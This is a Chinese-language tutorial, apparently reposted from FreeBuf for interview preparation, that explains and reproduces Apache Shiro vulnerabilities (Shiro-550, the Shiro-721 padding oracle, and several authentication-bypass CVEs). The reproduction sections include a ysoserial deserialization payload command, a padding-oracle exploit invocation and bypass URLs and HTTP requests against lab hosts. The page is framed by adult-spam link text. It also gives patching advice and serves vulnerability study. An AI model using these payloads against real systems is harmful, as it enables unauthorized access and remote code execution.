成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

一文讀懂面試官都在問的Shiro漏洞

安全 應用安全
? Apache Shiro 是一個強大易用的 Java 安全框架,提供了認證、授權、加密和會話管理等功能,對于任何一個應用程序,Shiro 都可以提供全面的安全管理服務。

漏洞簡介

shiro-550主要是由shiro的rememberMe內容反序列化導致的命令執行漏洞,造成的原因是默認加密密鑰是硬編碼在shiro源碼中,任何有權訪問源代碼的人都可以知道默認加密密鑰。于是攻擊者可以創建一個惡意對象,對其進行序列化、編碼,然后將其作為cookie的rememberMe字段內容發送,Shiro 將對其解碼和反序列化,導致服務器運行一些惡意代碼。

特征:cookie中含有rememberMe字段

修復建議:

  • 更新shiro到1.2.4以上的版本。
  • 不使用默認的加密密鑰,改為隨機生成密鑰。

漏洞原理

一、Shiro簡介

Apache Shiro 是一個強大易用的 Java 安全框架,提供了認證、授權、加密和會話管理等功能,對于任何一個應用程序,Shiro 都可以提供全面的安全管理服務。

在Apache Shiro<=1.2.4版本中AES加密時采用的key是硬編碼在代碼中的,于是我們就可以構造RememberMe的值,然后讓其反序列化執行。

image-20230407145722601

Primary Cocnerns(基本關注點):

  • Authentication(認證):經常和登錄掛鉤,是證明用戶說他們是誰的一個工作
  • Authorization(授權):訪問控制的過程,即,決定‘誰’可以訪問‘什么
  • Session Management(會話管理):管理用戶特定的會話,即使在非web或是EJB的應用中
  • Crytography(加密):通過加密算法保證數據的安全,且易于使用

Supporting Features(輔助特性):

  • Web Support(網絡支持):web support API可以幫助在web應用中方便的使用shiro
  • Caching(緩存):保證安全操作使用快速有效
  • Concurrency(并發):支持多線程應用
  • Testing(測試):支持集成單元測試
  • Run As(以..運行):可以假定用戶為另一個用戶
  • Remeber Me:記住用戶,無需再次登錄

二、Shiro服務器識別身份加解密處理的流程

1、加密
  1. 用戶使用賬號密碼進行登錄,并勾選”Remember Me“。
  2. Shiro驗證用戶登錄信息,通過后,查看用戶是否勾選了”Remember Me“。
  3. 若勾選,則將用戶身份序列化,并將序列化后的內容進行AES加密,再使用base64編碼。
  4. 最后將處理好的內容放于cookie中的rememberMe字段。
2、解密
  1. 當服務端收到來自未經身份驗證的用戶的請求時,會在客戶端發送請求中的cookie中獲取rememberMe字段內容。
  2. 將獲取到的rememberMe字段進行base64解碼,再使用AES解密。
  3. 最后將解密的內容進行反序列化,獲取到用戶身份。

三、Key

AES加密的密鑰Key被硬編碼在代碼里

漏洞復現

攻擊機IP:192.168.0.109

靶機IP:192.168.72.128

1、訪問靶機

image-20230413232506236

存在Remember me選項,嘗試抓包

image-20230413232641647

2、漏洞利用

Github上工具很多,我們隨便拿一款來進行驗證

爆破密鑰成功后,即可執行命令

image-20230421224623379

Shiro-721反序列化漏洞(CVE-2019-12422)


漏洞簡介

0x01 首先講一下面試官經常會問到的一個問題

Shiro550和Shiro721的區別是什么

Shiro550只需要通過碰撞key,爆破出來密鑰,就可以進行利用
Shiro721的ase加密的key一般情況下猜不到,是系統隨機生成的,并且當存在有效的用戶信息時才會進入下一階段的流程所以我們需要使用登錄后的rememberMe Cookie,才可以進行下一步攻擊
0x02 漏洞指紋
  • URL中含有Shiro字段
  • cookie中含有rememberMe字段
  • 返回包中含有rememberMe
0x03 漏洞介紹

在Shiro721中,Shiro通過AES-128-CBC對cookie中的rememberMe字段進行加密,所以用戶可以通過Padding Oracle加密生成的攻擊代碼來構造惡意的rememberMe字段,進行反序列化攻擊,需要執行的命令越復雜,生成payload需要的時間就越長。

漏洞原理

由于Apache Shiro cookie中通過 AES-128-CBC 模式加密的rememberMe字段存在問題,用戶可通過Padding Oracle 加密生成的攻擊代碼來構造惡意的rememberMe字段,用有效的RememberMe cookie作為Padding Oracle Attack 的前綴,然后制作精心制作的RememberMe來執行Java反序列化攻擊

攻擊流程

登錄網站,并從cookie中獲取RememberMe。使用RememberMe cookie作為Padding Oracle Attack的前綴。加密syserial的序列化有效負載,以通過Padding Oracle Attack制作精心制作的RememberMe。請求帶有新的RememberMe cookie的網站,以執行反序列化攻擊。攻擊者無需知道RememberMe加密的密碼密鑰。

AES-128-CBC

屬于AES加密算法的CBC模式,使用128位數據塊為一組進行加密解密,即16字節明文,對應16字節密文,,明文加密時,如果數據不夠16字節,則會將數據補全剩余字節

  • 若最后剩余的明文不夠16字節,需要進行填充,通常采用PKCS7進行填充。比如最后缺3個字節,則填充3個字節的0x03;若最后缺10個字節,則填充10個字節的0x0a;
  • 若明文正好是16個字節的整數倍,最后要再加入一個16字節0x10的組再進行加密

Padding Oracle Attack原理

Padding Oracle攻擊可以在沒有密鑰的情況下加密或解密密文

Shiro Padding Oracle Attack(Shiro填充Oracle攻擊)是一種針對Apache Shiro身份驗證框架的安全漏洞攻擊。Apache Shiro是Java應用程序中廣泛使用的身份驗證和授權框架,用于管理用戶會話、權限驗證等功能。

Padding Oracle Attack(填充Oracle攻擊)是一種針對加密算法使用填充的安全漏洞攻擊。在加密通信中,填充用于將明文數據擴展到加密算法塊大小的倍數。在此攻擊中,攻擊者利用填充的響應信息來推斷出加密算法中的秘密信息。

Shiro Padding Oracle Attack利用了Shiro框架中的身份驗證過程中的一個漏洞,該漏洞允許攻擊者通過填充信息的不同響應時間來確定身份驗證過程中的錯誤。通過不斷嘗試不同的填充方式,攻擊者可以逐步推斷出加密秘鑰,并最終獲取訪問權限。

這種攻擊利用了填充錯誤的身份驗證響應來獲取關于秘密信息的信息泄漏,然后根據這些信息進行進一步的攻擊。為了防止Shiro Padding Oracle Attack,建議及時更新Apache Shiro版本,確保已修復該漏洞,并采取其他安全措施,如使用安全的加密算法和密鑰管理策略。

漏洞復現

1、拉取環境

docker pull vulfocus/shiro-721
docker run -d -p 8080:8080 vulfocus/shiro-721

image-20230511102532555

環境啟動完成后,在本地瀏覽器訪問靶場地址:your-ip:8080

image-20230511102842746

2、攻擊環節

0x01 登錄成功后,我們從Cookie中獲取到rememberMe字段的值

image-20230511141836711

0x02 使用ysoserial生成Payload

java -jar ysoserial.jar CommonsCollections1 "touch /tmp/YikJiang" > payload.class

image-20230511113442522

0x03 使用rememberMe值作為prefix,加載Payload,進行Padding Oracle攻擊。

python shiro_exp.py http://47.95.201.15:8080/account/ k+3DDsh6f+macxMUtS2QvAS7Fm3CyMpFB6wz4apvrieZhTIMaLey74RYMgywpM2fFncf3y7cRTU6F73MIJ5ygJ0QqzYlvX2xcmOUCe+uLiH66B0aAcs7vY6Ipimbo8tTX3vbReu0vovnmDVK4fT+lfmhZxtgFp8imCapqIb6KYr3NtmQTfORGhFZ+I2vzMN2geaYRwFkTbzfuo8vHgmzHJaR1jTn2sLVaxiIuqMYqsjiCVvN7q64wpde0JGQs1eowMKJ5VSlnUnp1NGficIFYdTETxDjJJHrmKNSxdHPCstWfQD3N6jEK1CT3vE+UxxVrtSO2XoBEHYrSTdK1bxVtunwVu5+F7lfwex3b2qY/F6EzCUjzKQN13AmqhrnyesRx+AYNzVFCZ49oYfj/dtz1XKbGr9anMuw6dq/avJdMfHzlEUThYFgZ2yRSUBAlOGliwwV+GRuhjRocka3wAgjxyG80VdJiovtXhoEhvd3peYC6TzPi2hPVXppVq3P+F8s payload.class

image-20230511173316224

生成的payload.class內容越多時間就越長,所以盡量選擇較短的命令執行來復現漏洞即可。最終會生成如下rememberMe cookies

image-20230512112537296

我們將跑出來的Cookie添加到數據包中進行發送,就可以 發現在靶機中成果創建了對應的文件。

image-20230518155338408

到這未知其實經常遇到的Shrio漏洞已經表述的差不多了,下面幾個是shiro存在但是在現實中利用難度大或者是比較少的洞,可以簡單了解一下

Shiro 認證繞過漏洞(CVE-2020-1957)

漏洞原理

在Apache Shiro 1.5.2以前的版本中,在使用Spring動態控制器時,攻擊者通過構造..;這樣的跳轉,可以繞過Shiro中對目錄的權限限制。

URL請求過程:

  • 客戶端請求URL:/xxx/..;/admin/
  • Shrio 內部處理得到校驗URL為/xxxx/..,校驗通過
  • SpringBoot 處理/xxx/..;/admin/, 最終請求/admin/, 成功訪問了后臺請求。

漏洞復現

1、權限配置

@Bean
public ShiroFilterChainDefinition shiroFilterChainDefinition() {
    DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();
    chainDefinition.addPathDefinition("/login.html", "authc"); // need to accept POSTs from the login form
    chainDefinition.addPathDefinition("/logout", "logout");
    chainDefinition.addPathDefinition("/admin/**", "authc");
    return chainDefinition;
}

2、默認狀態

直接請求管理頁面/admin/,無法訪問,將會被重定向到登錄頁面

image-20230519103636581

3、繞過POC

構造惡意請求/xxx/..;/admin/,即可繞過權限校驗,訪問到管理頁面:

image-20230519103834717

image-20230519105853459

Shiro 身份驗證繞過 (CVE-2020-13933)

漏洞簡介

CVE-2020-11989的修復補丁存在缺陷,在1.5.3及其之前的版本,由于shiro在處理url時與spring仍然存在差異,依然存在身份校驗繞過漏洞由于處理身份驗證請求時出錯,遠程攻擊者可以發送特制的HTTP請求,繞過身份驗證過程并獲得對應用程序的未授權訪問。

該漏洞產生的原因主要是shiro層在處理url上和spring上存在差異,主要是在處理;上的問題,通過構造含有;符號的url即可繞過shiro在權限上的處理,而spring不負責權限管控,所以最終會導致權限繞過。ant風格的路徑僅出現一個*時才能成功,而**無法繞過,*:匹配一個或者多個任意的字符。

**:匹配零個或者多個目錄。

漏洞復現

1、開啟環境

image-20230520234113666

2、正常訪問敏感界面

/admin/admin

image-20230520234302554

提示讓我們登錄

3、通過%3b繞過,不觸發身份驗證并且繞過權限

/admin/%3badmin

image-20230520234555248

Shiro 授權繞過 (CVE-2022-32532)

漏洞簡介

Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。

1.9.1 之前的 Apache Shiro,RegexRequestMatcher 可能被錯誤配置為在某些 servlet 容器上被繞過。在正則表達式中使用帶有.的 RegExPatternMatcher 的應用程序可能容易受到授權繞過。

漏洞概述

2022年6月29日,Apache 官方披露 Apache Shiro 權限繞過漏洞(CVE-2022-32532),當 Apache Shiro 中使用 RegexRequestMatcher 進行權限配置,且正則表達式中攜帶“.”時,未經授權的遠程攻擊者可通過構造惡意數據包繞過身份認證。

影響范圍

Apache Shiro < 1.9.1

利用流程

訪問

image-20221224001446418

抓包修改

GET /permit/any HTTP/1.1
Host: 123.58.224.8:36930
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: think_lang=zh-cn
Connection: close

image-20221224001506486

需要攜帶token字段

image-20221224001638940

改包繞過

GET /permit/%0any HTTP/1.1
Host: 123.58.224.8:36930
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: think_lang=zh-cn
Connection: close

image-20221224002300059

責任編輯:武曉燕 來源: FreeBuf.COM
相關推薦

2020-05-11 14:35:11

微服務架構代碼

2020-12-18 09:36:01

JSONP跨域面試官

2021-11-08 09:18:01

CAS面試場景

2021-12-25 22:31:10

MarkWord面試synchronize

2023-12-22 19:59:15

2021-08-04 16:06:45

DataOps智領云

2018-09-28 14:06:25

前端緩存后端

2022-09-22 09:00:46

CSS單位

2025-04-03 10:56:47

2022-11-06 21:14:02

數據驅動架構數據

2021-09-04 19:04:14

配置LogbackJava

2021-12-16 18:38:13

面試Synchronize

2023-11-27 17:35:48

ComponentWeb外層

2023-05-20 17:58:31

低代碼軟件

2022-07-05 06:30:54

云網絡網絡云原生

2022-07-26 00:00:03

語言模型人工智能

2021-12-29 18:00:19

無損網絡網絡通信網絡

2022-10-20 08:01:23

2022-12-01 17:23:45

2023-11-21 09:41:00

緩存策略存儲
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 粉嫩国产精品一区二区在线观看 | 一区二区三区视频免费观看 | 日韩一级免费看 | 一级片免费视频 | 中文字幕国产一区 | 国产黄色av网站 | 日韩一区二区精品 | 嫩草懂你的影院入口 | 国产精品二区三区在线观看 | 男人电影天堂 | 国产精品久久久久久久7电影 | 欧美在线视频免费 | 色婷婷综合在线观看 | 欧美福利 | 福利片在线 | 日韩欧美视频 | 日韩精品 电影一区 亚洲 | 国产精品一区2区 | 给我免费的视频在线观看 | 国产亚洲人成a在线v网站 | 91av视频在线播放 | 午夜影院网站 | 最新av中文字幕 | 成人久久 | 欧美激情综合色综合啪啪五月 | 在线免费国产视频 | 久久久国产精品一区 | 亚洲一区二区三区在线播放 | 国精产品一品二品国精在线观看 | 激情视频网站 | www.色综合 | 久久精品 | 伊人亚洲 | 欧美日本韩国一区二区 | 欧美成人精品一区二区三区 | 日本三级播放 | 久草在线青青草 | 久久久久久久一区 | 免费在线播放黄色 | 亚洲高清一区二区三区 | 国产精品久久久久久久久久免费看 |